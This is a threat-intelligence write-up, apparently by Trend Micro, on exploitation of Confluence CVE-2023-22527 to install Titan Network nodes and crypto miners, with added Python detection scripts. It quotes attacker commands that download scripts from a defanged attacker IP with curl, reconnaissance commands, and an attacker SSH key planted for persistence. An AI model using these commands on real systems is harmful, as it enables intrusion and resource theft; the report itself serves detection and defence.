Overview
- Trend Micro researchers observed an attacker exploiting the Atlassian Confluence vulnerability CVE-2023-22527 to achieve remote code execution and use the compromised server for cryptocurrency mining through the Titan Network.
- The attacker used a public IP lookup service and a range of system commands to gather information about the compromised machine.
- The attack chain consisted of downloading and running several shell scripts that install the Titan binaries and bind the node to the Titan Network under the attacker's identity.
- The attacker connects compromised systems to the Cassini Testnet, which gives them access to its delegated proof-of-stake system for token rewards.
We recently observed an attack in which a threat actor exploited the Atlassian Confluence server vulnerability CVE-2023-22527. The flaw allowed unauthenticated remote code execution (RCE), which the attacker used to enrol the server in the Titan Network for cryptocurrency mining. Titan Network is a decentralized physical infrastructure network (DePIN) platform that lets users share and deploy hardware resources, turning them into digital assets such as computing power, storage, and bandwidth. Its network design and economic incentives reward contributors for the resources they provide, while consumers get reliable services comparable to contemporary cloud offerings. In this attack, the threat actor compromises victims' machines and installs Titan edge nodes so that the rewards accrue to the attacker.
Sequence of Attack
The attacker exploited the Atlassian Confluence server through CVE-2023-22527, an unauthenticated template injection flaw. Within the attack payload, the attacker sets a response header named "Cmd" that carries the output of the executed commands. The attack starts with the "ls" command to list the files in the current directory; its output can be seen in the "Cmd" response header (Figure 2).
Next, the attacker runs the "pwd" command to discover the current working directory (Figure 3).
The attacker lists the files in "/tmp" with "ls /tmp", then retrieves operating system details with "cat /etc/os-release" and kernel and system details with "uname -a". Each command is run remotely through the injected template, in the same way "exec({'curl ip-api.com'})" was used to run commands on the victim's machine (Figure 4). Once the basic system information is collected, the attacker examines the control group (cgroup) data of the process with PID 1, normally the "init" process on Linux. This reveals whether the Confluence server runs inside a container, information that could be used for later privilege escalation.
The attacker continues to run commands remotely, as in Figure 4, to assess system resources: "df -h" for disk space and "free -g" for available memory. As shown in Figure 6, after collecting the system and resource details, the attacker downloads a shell script named "0" from the server 3[.]39[.]22[.]13 and saves it as "a0" in the "/tmp" directory of the compromised host. The script carries no file extension, which avoids detections that key on file extensions.
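A detection that follows from the behaviour above: the exploit payload stores command output in a response header named "Cmd", which Confluence never sets on its own. The following added example (not Trend Micro's or Atlassian's code) parses a raw request/response pair from a proxy or WAF capture and flags responses carrying that header; the endpoint path, parameter name and captured strings are constructed placeholders.

```python
"""Flag Confluence HTTP responses that carry the attacker's "Cmd" header.

The header's presence in a Confluence response is a high-confidence signal of
CVE-2023-22527 exploitation and also shows the responder what the attacker saw.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass
class Finding:
    status_line: str
    command_output: str   # whatever the attacker's command printed
    request_has_exec: bool


def parse_http_message(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP message into (start line, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect_exchange(raw_request: str, raw_response: str) -> Optional[Finding]:
    """Return a Finding when the response carries a Cmd header, else None."""
    req_start, _, req_body = parse_http_message(raw_request)
    resp_start, resp_headers, _ = parse_http_message(raw_response)
    output = resp_headers.get("cmd")
    if output is None:
        return None
    # The page shows the injected template calling exec({...}); seeing it in the
    # request strengthens the verdict, but the header alone is sufficient.
    has_exec = "exec(" in req_start or "exec(" in req_body
    return Finding(resp_start, output, has_exec)


# Constructed capture: path, parameter name and values are placeholders, not a real payload.
SAMPLE_REQUEST = (
    "POST /PLACEHOLDER-ENDPOINT HTTP/1.1\r\nHost: confluence.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "PLACEHOLDER=exec({'ls'})"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nCmd: bin confluence logs temp\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)
BENIGN_RESPONSE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"
```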
The downloaded shell script depicted in Figure 6 fetches the file “titan.tar.gz” from the same server, then unpacks the Executable and Linkable Format (ELF) files “titan-edge” and “libgoworkerd.so” into the “/tmp” directory (Figure 7).
Another shell script, named "1", was saved to "/tmp" as "a1" with the command "curl -o /tmp/a1 3[.]39[.]22[.]13/1", in the same way as script "0". This script overwrites the "LD_LIBRARY_PATH" environment variable; however, the variable is misspelled as "LD_LIZBRARY_PATH", and it is unclear whether the mistake was intentional. The "titan-edge" daemon then starts establishing a connection to the Titan network (Figure 8). The attacker connects to the "Cassini Testnet", which comprises two primary components:
- Blockchain Network – Operated on the Delegated Proof of Stake (DPOS) mechanism, participants gain rewards by allocating TTNT test tokens for engagement in chain governance and interaction
- Resource Network – If dormant hardware resources exist, users can operate Titan nodes to earn TNT3 point rewards
The third shell script, named "2", was saved to "/tmp" as "a2" with the command "curl -o /tmp/a2 3[.]39[.]22[.]13/2", mirroring the preceding steps. This script launches the "titan-edge" binary with "storage-size" and "storage-path" settings, and the device is then bound to "titan-edge" under the attacker's identity code, "08DA69AE-6E7C-43F2-A8D0-D97D7FF517A1" (Figure 9).
Similarly, the attacker saves the fourth shell script, "3", to "/tmp" as "a3" with the command "curl -o /tmp/a3 3[.]39[.]22[.]13/3". This script records the node's unique identifier, obtained with the "info" parameter, in the file "info.log" (Figure 10).

The fifth shell script, "4", is saved to "/tmp" as "a4" with the command "curl -o /tmp/a4 3[.]39[.]22[.]13/4"; its purpose is to stop the "titan-edge" daemon (Figure 11).

After downloading all the required files to the target machine, the attacker verifies that they are present in the "/tmp" directory (Figure 12).

The attacker then executes the first downloaded file, "a0" (Figure 13).

As described earlier, this script extracts the "titan-edge" binaries from "titan.tar.gz". The attacker then confirms that the files are in place by remotely executing "ls -lh /tmp" through the attack payload.
Once the "titan-edge" binaries are confirmed to be on the system, the attacker runs the remaining scripts (a1, a2, a3, and a4). These scripts start the Titan binaries, connect to the Titan network, and bind the node to the attacker's identity. The attacker also drops additional shell scripts "5", "6", and "7" as "a5", "a6", and "a7" respectively. The "a5" script serves as a fallback: if "a0" fails to download and extract the files correctly, "a5" fetches the same Titan binaries from the official Titan GitHub repository.
After the connection to the Titan Network is established, the "a6" script deploys the "aleo-pool" client, which connects to the "zkRush Pool" server and "Aleo TestNet Beta" for cryptocurrency mining (Figure 14).

Running the "aleo-pool" client through the "a7" script connects the system to the aleo[.]zkrush[.]com mining pool server.

Additional files were found on the attacker's file server that appear intended for lateral movement over SSH within an Amazon Web Services (AWS) environment. The "a8" script downloads an RSA SSH public key and adds it to the root user's "/root/.ssh/authorized_keys" file.

The SSH public key discovered is as follows:
“ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl+1YDRZdck+HOkzQwdAWzLkdn1Ws1jmgE9aC93iUuzJlpsMhKkkkziWozsYZrQv7j3Tx1QWtSZg8J5VxMmSY0MhzefdhTYZ0Pf9XYPlVsQiLkBTDeoKyyWZS4NwZBysSzE20/jq0Ke4tnFIEe39lP1OaIShLofktHKXsx0xUkfDxFMiDgw2nB4cXhATqdhC3nFQXl0wdlzih0/Yw+QlHoZbQ6/3kJIdw7kWL1N8GcAkjUtaRK6vONwluEi9HIyNsLVUVqS74v4NNRdKA8Rwdg8R5CQSRnzXaD3e+5tmFIkSzArIQQVktDt+Re6z4ZVYFfNfdjCxeqGTJLP6Yt/iE7 aaaaaa-1%”
The "a9" file is a modified SSH configuration file that the attacker could later use to replace the host's current SSH configuration. It contains two notable directives, "AuthorizedKeysCommand" and "AuthorizedKeysCommandUser" (Figure 17).

The SSH daemon uses "AuthorizedKeysCommand" and "AuthorizedKeysCommandUser", which are configured when EC2 Instance Connect is installed, to retrieve the public key from the instance metadata for authentication and to allow connections to the EC2 virtual machine. Replacing these directives therefore changes which keys the daemon trusts.
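The host-side artifacts described in this section (the scripts dropped in "/tmp", the LD_LIBRARY_PATH override in "a1", the key added to root's authorized_keys by "a8", and the AuthorizedKeysCommand directives in "a9") can be checked together. The following added example is not Trend Micro's or the Titan project's code; it runs over text already collected from a host, and all sample inputs and the sshd baseline are constructed or assumed.

```python
"""Triage collected host data for the Titan/Confluence intrusion artifacts.

Inputs are an `ls /tmp` capture, a dropped script, the root authorized_keys
file and sshd_config. Samples below are constructed."""
import re
from typing import Dict, List, Set

# File names the page reports being dropped into /tmp.
DROPPED_NAMES = {"titan-edge", "libgoworkerd.so", "titan.tar.gz", "info.log"} | {f"a{i}" for i in range(10)}
# Catches LD_LIBRARY_PATH assignments, including the misspelled LD_LIZBRARY_PATH.
LD_PATH_RE = re.compile(r"\bLD_LI\w*BRARY_PATH\s*=")


def check_tmp_listing(listing: str) -> List[str]:
    """Return the dropped-file names present in an `ls /tmp` capture."""
    return sorted(DROPPED_NAMES & set(listing.split()))


def check_script(script: str) -> List[str]:
    """Flag dynamic-linker overrides and Titan invocations in a dropped script."""
    hits = []
    if LD_PATH_RE.search(script):
        hits.append("LD_LIBRARY_PATH override")
    if "titan-edge" in script:
        hits.append("titan-edge invocation")
    return hits


def check_authorized_keys(text: str, allowed_blobs: Set[str]) -> List[str]:
    """Return comments of authorized_keys entries whose key material is not allow-listed."""
    hits = []
    for line in text.splitlines():
        parts = line.split(None, 2)  # key type, base64 blob, optional comment
        if len(parts) >= 2 and parts[1] not in allowed_blobs:
            hits.append(parts[2].strip() if len(parts) == 3 else "(no comment)")
    return hits


def check_sshd_config(text: str, baseline: Dict[str, str]) -> List[str]:
    """Flag AuthorizedKeysCommand* directives that differ from the expected baseline."""
    hits = []
    for line in text.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) == 2 and parts[0].startswith("AuthorizedKeysCommand"):
            if baseline.get(parts[0]) != parts[1].strip():
                hits.append(f"{parts[0]} {parts[1].strip()}")
    return hits


# Constructed samples. BASELINE is assumed to be what EC2 Instance Connect installs;
# replace it with whatever your own images ship.
SAMPLE_TMP = "a0 a1 a2 titan-edge libgoworkerd.so hsperfdata_confluence"
SAMPLE_SCRIPT = "export LD_LIZBRARY_PATH=/tmp\n/tmp/titan-edge\n"
SAMPLE_KEYS = "ssh-rsa CONSTRUCTED_BLOB_1 aaaaaa-1%\nssh-ed25519 CONSTRUCTED_BLOB_2 admin@corp\n"
SAMPLE_SSHD = "Port 22\nAuthorizedKeysCommand /tmp/fetch_keys.sh %u\nAuthorizedKeysCommandUser root\n"
BASELINE = {"AuthorizedKeysCommand": "/opt/aws/bin/eic_run_authorized_keys %u %f",
            "AuthorizedKeysCommandUser": "ec2-instance-connect"}
```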
We have also observed a different version of the file named "7", which starts a bash reverse shell to the C&C server 13[.]236[.]179[.]8 over TCP port 80 (Figure 18).

Summary
Through a sequence of reconnaissance, payload deployment, and persistence mechanisms, the attacker hijacked server resources and enrolled compromised systems in the Titan Network for their own financial gain. The incident underscores the importance of keeping security patches current, monitoring network and file activity closely, and enforcing strong access controls.
To reduce the probability of this kind of risk, organizations can also evaluate potent security technologies like Trend Vision One™, which provides layered protection and behavior detection, aiding in blocking malicious tools and services before they can bring harm to user machines and systems.
MITRE ATT&CK techniques
| Tactic | Technique | Technique ID |
|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 |
| Discovery | System Information Discovery | T1082 |
| Discovery | File and Directory Discovery | T1083 |
| Discovery | Process Discovery | T1057 |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| Persistence | Hijack Execution Flow: Dynamic Linker Hijacking | T1574.006 |
| Persistence | Account Manipulation: SSH Authorized Keys | T1098.004 |
| Command and Control | Ingress Tool Transfer | T1105 |
| Command and Control | Application Layer Protocol: Web Protocols | T1071.001 |
Indicators of Compromise (IOCs)